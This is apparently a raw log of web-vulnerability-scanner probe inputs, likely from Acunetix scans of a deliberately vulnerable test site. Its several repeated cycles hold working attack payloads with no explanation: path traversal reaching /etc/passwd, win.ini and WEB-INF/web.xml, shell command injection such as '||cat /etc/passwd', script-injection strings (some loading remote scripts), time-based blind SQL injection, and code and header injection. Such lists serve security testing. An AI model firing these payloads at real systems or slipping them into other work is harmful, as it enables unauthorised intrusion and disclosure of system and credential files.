.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

1

1

1

testasp.vulnweb.com

1_sbyST <ScRiPt >prompt(965430)</ScRiPt>

iSzu9XhX')

/etc/passwd

'

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

xcEINQRQ'))

1

1

1

1

1

1

"

"

acunetix_wvs_invalid_filename

1

-1

1

1

${@print(md5(acunetix_wvs_security_test))}

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hitzYiFAJsXRZ.bxss.me/

1

||cat /etc/passwd

comments

1

1

-1)

1

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

&dir

comments

1

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

'&dir&'

comments/.

http://www.acunetix.tst

'"

jRGt8X77'

1

1

1'"()&%<ScRiPt >prompt(953002)</ScRiPt>

1

WBkeHtaK')

"&dir&"

<!--

1

y3AERcsO'))

file:///etc/passwd

1

'"()&%<ScRiPt >prompt(917489)</ScRiPt>

|dir

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1_947054

1

1

1

'|dir

1

WEB-INF/web.xml

1

"|dir

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

acu9651\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9651

1

1

acux10746\xc0\xbez1\xc0\xbcz2a\x90bcxuca10746

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(971976)</ScRiPt>

1

1

1

1<script>prompt(964144)</script>

response.write(9119971*9483153)

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

'+response.write(9119971*9483153)+'

1<ScRiPt >prompt(937797)</ScRiPt>

&cat /etc/passwd&

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

"+response.write(9119971*9483153)+"

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?984262></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

'&cat /etc/passwd&'

1

1

1<ScRiPt >prompt(900988)</ScRiPt>

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(934897)">

1

1

1

cat /etc/passwd

WEB-INF/web.xml

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(913007)"></g></svg>

../../../../../../../../../../etc/passwd

`cat /etc/passwd`

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

|cat /etc/passwd#

-1

1<div style=width:expression(prompt(925249))>

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

1

-1)

1<iframe src='data:text/html

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

${99130+99072}

1<body onload=prompt(999208)>

1

-1))

"|"ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

PYOEUtdP'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(961174)>

1

)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n960161=v902796

1

1<img src=xyz OnErRor=prompt(938729)>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

q1x8qtLh')

'

1

1

1some_inexistent_file_with_long_name%00.jpg

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

pMjz1i83'))

1<img/src=">" onerror=alert(915709)>

"

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

^(#$!@#$)(()))******

1<ScRiPt%20>prompt(967798)</sCripT>

/etc/passwd

'

-1

testasp.vulnweb.com

||cat /etc/passwd

1&lt

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1)

"

&dir

1

1

\xf6<img acu onmouseover=prompt(945632) //\xf6>

1

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

'&dir&'

http://hit08H3LNkMq2.bxss.me/

acunetix_wvs_invalid_filename

1

1

1<input autofocus onfocus=prompt(962842)>

${@print(md5(acunetix_wvs_security_test))}\

1

O9pDd9Pw'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

"&dir&"

comments

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

ROu9l8QU')

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

|dir

comments

1

file:///etc/passwd

5AZIJQHu'))

[url=http://www.acunetix.com]website security[/url]

http://www.acunetix.tst

1

1

1

'"

comments/.

'|dir

1

1_9J0cm <ScRiPt >prompt(958652)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(957356)</ScRiPt>

1

1

<!--

"|dir

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(920372)</ScRiPt>

1

1

1

1

1

1

1

WEB-INF\web.xml

1

1_954047

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

................windowswin.ini

1

1

1

acu8642\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8642

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

acux3703\xc0\xbez1\xc0\xbcz2a\x90bcxuca3703

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(950165)</ScRiPt>

1

1

1

1<script>prompt(975917)</script>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(967472)</ScRiPt>

response.write(9399026*9703964)

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?906275></ScRiPt>

1

'+response.write(9399026*9703964)+'

1<ScRiPt >prompt(972240)</ScRiPt>

1

&cat /etc/passwd&

1

WEB-INF/web.xml

1

"+response.write(9399026*9703964)+"

1<video><source onerror="javascript:prompt(914729)">

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(939141)"></g></svg>

1

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

1<div style=width:expression(prompt(994283))>

cat /etc/passwd

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

1<body onload=prompt(926925)>

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${100240+99038}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(977391)>

1

-1

1

1

'|'ld

1

)

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n927011=v988646

1<img src=xyz OnErRor=prompt(924333)>

-1)

"|"ld

1

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img/src=">" onerror=alert(940744)>

1

'"()

1

^(#$!@#$)(()))******

testasp.vulnweb.com

1

1<ScRiPt%20>prompt(952067)</sCripT>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

eqReqpCE'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'

1

'

1

/etc/passwd

1

q67CfY7i')

1&lt

1

1

1

"

"

1

1

19SAxfQi'))

1

http://hitWeO77alLPM.bxss.me/

\xf6<img acu onmouseover=prompt(909362) //\xf6>

${@print(md5(acunetix_wvs_security_test))}

1

1

||cat /etc/passwd

-1

acunetix_wvs_invalid_filename

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<input autofocus onfocus=prompt(926074)>

${@print(md5(acunetix_wvs_security_test))}\

1

comments

1

&dir

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

1

'&dir&'

-1))

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

[url=http://www.acunetix.com]website security[/url]

http://www.acunetix.tst

'"

"&dir&"

comments/.

80tVdYXa'

1

<!--

1

1_p4Uso <ScRiPt >prompt(922390)</ScRiPt>

1

1

|dir

SoObdS8k')

1

1

1'"()&%<ScRiPt >prompt(992864)</ScRiPt>

1

file:///etc/passwd

1

1

1

H8frtsko'))

1

'|dir

1

1

1

1

'"()&%<ScRiPt >prompt(985504)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

1

WEB-INF/web.xml

1

1_933967

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

acu4879\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4879

1

acux8192\xc0\xbez1\xc0\xbcz2a\x90bcxuca8192

1

1

1<ScRiPt >prompt(901248)</ScRiPt>

1

1

1<script>prompt(944314)</script>

1

WEB-INF/web.xml

1

1

1

1<ScRiPt >prompt(956360)</ScRiPt>

1

WEB-INF\web.xml

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?935027></ScRiPt>

1

1

1

1<ScRiPt >prompt(955465)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(913982)">

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(907096)"></g></svg>

1

1

1<div style=width:expression(prompt(994741))>

1

1<iframe src='data:text/html

1

1<body onload=prompt(983156)>

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(928564)>

1

1<img src=xyz OnErRor=prompt(907018)>

1<img/src=">" onerror=alert(962092)>

1

1<ScRiPt%20>prompt(980711)</sCripT>

1

1&lt

\xf6<img acu onmouseover=prompt(942928) //\xf6>

1

1<input autofocus onfocus=prompt(946239)>

1

<a href='http://www.acunetix.com'>website security</a>

[url=http://www.acunetix.com]website security[/url]

1

1

1_UOPWr <ScRiPt >prompt(971388)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

response.write(9372091*9840571)

1

1

'+response.write(9372091*9840571)+'

&cat /etc/passwd&

"+response.write(9372091*9840571)+"

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

../../../../../../../../../../etc/passwd

1

1

`cat /etc/passwd`

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

|cat /etc/passwd#

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

${99470+99018}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../../../../../../../../../../etc/passwd.jpg

'|'ld

-1

1&n963246=v986293

1

1some_inexistent_file_with_long_name%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

"|"ld

-1)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

testasp.vulnweb.com

^(#$!@#$)(()))******

1

'

giHQWJaD'

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'

1

1

0J2MpT4C')

"

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"

http://hitbgbUNHHIZf.bxss.me/

1

1

E3qYOAbT'))

/etc/passwd

1

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

acunetix_wvs_invalid_filename

-1

${@print(md5(acunetix_wvs_security_test))}\

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

-1)

1

1

'&dir&'

'"

1

http://www.acunetix.tst

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1'"()&%<ScRiPt >prompt(946820)</ScRiPt>

-1))

1

comments

<!--

oHB4SkSC'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"&dir&"

'"()&%<ScRiPt >prompt(984680)</ScRiPt>

1

1

comments/.

1

|dir

1_941861

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

uCIMyFUw')

1

1

1

'|dir

9x1RYbjR'))

1

1

file:///etc/passwd

"|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

WEB-INF/web.xml

1

1

acu3468\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3468

WEB-INF\web.xml

acux5686\xc0\xbez1\xc0\xbcz2a\x90bcxuca5686

1

1<ScRiPt >prompt(918985)</ScRiPt>

../../../../../../../../../../windows/win.ini

1

1<script>prompt(906651)</script>

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(968557)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?988440></ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(917245)</ScRiPt>

1

1<video><source onerror="javascript:prompt(948579)">

................windowswin.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(971837)"></g></svg>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<div style=width:expression(prompt(948428))>

1

response.write(9662909*9213933)

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<iframe src='data:text/html

1

'+response.write(9662909*9213933)+'

&cat /etc/passwd&

1

1

1<body onload=prompt(939935)>

"+response.write(9662909*9213933)+"

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

'&cat /etc/passwd&'

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(958886)>

1

"&cat /etc/passwd&"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<img src=xyz OnErRor=prompt(923352)>

1

1

cat /etc/passwd

1

1

1<img/src=">" onerror=alert(969191)>

WEB-INF/web.xml

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1<ScRiPt%20>prompt(957521)</sCripT>

`cat /etc/passwd`

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

${99161+99692}

1&lt

|cat /etc/passwd#

-1

1

1

\xf6<img acu onmouseover=prompt(902514) //\xf6>

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd.jpg

'|'ld

1&n917220=v931740

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<input autofocus onfocus=prompt(951023)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

<a href='http://www.acunetix.com'>website security</a>

-1))

1some_inexistent_file_with_long_name%00.jpg

1

"|"ld

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

[url=http://www.acunetix.com]website security[/url]

)

LHm0pxFu'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1_7erZt <ScRiPt >prompt(979685)</ScRiPt>

1

'"()

s14NfFaw')

!(()&&!|*|*|

'

testasp.vulnweb.com

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

DNZGDoTm'))

"

^(#$!@#$)(()))******

"

1

1

1

1

1

-1

||cat /etc/passwd

1

/etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

1

1

http://hitNMze9HMpCs.bxss.me/

-1)

1

&dir

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

-1))

'&dir&'

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments

1

cozO7YCA'

'"

http://www.acunetix.tst

"&dir&"

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1'"()&%<ScRiPt >prompt(901267)</ScRiPt>

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

<!--

1

|dir

'"()&%<ScRiPt >prompt(968887)</ScRiPt>

1

BUnX3rVl')

1

1

comments/.

1

1

qUiRFOaY'))

'|dir

1_982144

1

file:///etc/passwd

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

1

1

1

WEB-INF/web.xml

1

1

1

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

1

acu7916\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7916

1

../../../../../../../../../../boot.ini

acux6478\xc0\xbez1\xc0\xbcz2a\x90bcxuca6478

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(943887)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(998750)</script>

................windowswin.ini

1

1

1<ScRiPt >prompt(953945)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?901389></ScRiPt>

1

1

1

1<ScRiPt >prompt(916788)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9937077*9936135)

1

1

1

'+response.write(9937077*9936135)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(937334)">

"+response.write(9937077*9936135)+"

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(985629)"></g></svg>

WEB-INF/web.xml

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<div style=width:expression(prompt(970884))>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

1

'&cat /etc/passwd&'

1<iframe src='data:text/html

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(907771)>

"&cat /etc/passwd&"

1

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

cat /etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(978332)>

1

${99555+99913}

../../../../../../../../../../etc/passwd.jpg

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<img src=xyz OnErRor=prompt(921766)>

1

`cat /etc/passwd`

1

-1

)

1some_inexistent_file_with_long_name%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n948646=v985507

1<img/src=">" onerror=alert(933631)>

1

|cat /etc/passwd#

1

-1)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

'"()

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<ScRiPt%20>prompt(914628)</sCripT>

'|'ld

testasp.vulnweb.com

-1))

^(#$!@#$)(()))******

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

oSeld6hG'

1

"|"ld

1

'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

\xf6<img acu onmouseover=prompt(978228) //\xf6>

1

1

tX9NvFxV')

"

1

1

/etc/passwd

PMbnjfWM'))

1

http://hitAlICH3FvSB.bxss.me/

1

1<input autofocus onfocus=prompt(957652)>

1

'

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

-1

<a href='http://www.acunetix.com'>website security</a>

1

1

-1)

comments

"

${@print(md5(acunetix_wvs_security_test))}\

1

[url=http://www.acunetix.com]website security[/url]

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

comments

-1))

||cat /etc/passwd

1_YxlB8 <ScRiPt >prompt(908810)</ScRiPt>

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

f2rOBTR7'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'"

1

comments/.

1

&dir

1

3D2k9X03')

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

<!--

1

1

1'"()&%<ScRiPt >prompt(988144)</ScRiPt>

'&dir&'

1

1

FZIMRUUP'))

1

'"()&%<ScRiPt >prompt(991332)</ScRiPt>

1

1

1

1

1

1

"&dir&"

file:///etc/passwd

1_919089

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

|dir

1

1

WEB-INF/web.xml

'|dir

WEB-INF\web.xml

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu9458\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9458

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux2555\xc0\xbez1\xc0\xbcz2a\x90bcxuca2555

1

1<ScRiPt >prompt(911624)</ScRiPt>

1

................windowswin.ini

1

1<script>prompt(979581)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

response.write(9345332*9884997)

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(939669)</ScRiPt>

1

1

1

'+response.write(9345332*9884997)+'

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

"+response.write(9345332*9884997)+"

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?937642></ScRiPt>

1

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(971411)</ScRiPt>

1

1

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1<video><source onerror="javascript:prompt(907036)">

1

1

WEB-INF/web.xml

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(906262)"></g></svg>

1

1

WEB-INF\web.xml

1

-1

SomeCustomInjectedHeader:injected_by_wvs

1

1<div style=width:expression(prompt(982608))>

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

${100058+99616}

1

SomeCustomInjectedHeader:injected_by_wvs

1

-1)

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'&cat /etc/passwd&'

1<iframe src='data:text/html

1

-1))

SomeCustomInjectedHeader:injected_by_wvs

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

"&cat /etc/passwd&"

1<body onload=prompt(976334)>

../../../../../../../../../../etc/passwd.jpg

)

1&n910627=v935160

1

1

1

1some_inexistent_file_with_long_name%00.jpg

lYls5q2m'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(985343)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

cat /etc/passwd

!(()&&!|*|*|

1

1<img src=xyz OnErRor=prompt(902049)>

dbdwd34d')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

`cat /etc/passwd`

^(#$!@#$)(()))******

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

0hn0YDuV'))

